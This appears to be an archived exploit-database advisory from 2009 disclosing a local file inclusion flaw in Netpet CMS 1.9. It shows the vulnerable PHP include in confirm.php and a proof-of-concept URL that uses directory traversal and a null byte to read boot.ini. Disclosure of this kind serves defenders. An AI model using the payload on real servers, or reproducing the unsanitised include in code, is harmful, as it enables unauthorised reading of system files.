id: 5595
date: 08/02/2009
title: Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability
author: SirGod
cves: 

========================================================================
Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability
========================================================================


############################################################################################
[+] Netpet CMS 1.9 (confirm.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
############################################################################################

[+] Download : http://www.netpet.at/en/downloads

[+] Local File Inclusion

  - Vulnerable code in netpet/confirm.php

------------------------------------------------------------------------
$selLang = $_GET['language'];
if($selLang!=""){
	include $netpetfolder."netpet/languages/".$selLang.".lang.php";
------------------------------------------------------------------------

  - PoC

   http://127.0.0.1/[path]/netpet/confirm.php?language=../../../../../../../boot.ini%00

############################################################################################



#  0day.today [2023-03-23]  #